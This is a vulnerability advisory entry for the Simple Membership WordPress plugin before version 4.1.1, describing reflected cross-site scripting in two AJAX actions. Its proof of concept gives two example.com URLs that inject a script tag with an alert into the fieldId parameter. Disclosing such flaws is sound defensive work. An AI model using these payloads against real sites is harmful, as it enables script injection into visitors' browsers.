WordPress Plugin Vulnerabilities
Simple Membership < 4.1.1 - Reflected Cross-Site Scripting
Description
The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-18 (about 1 years ago)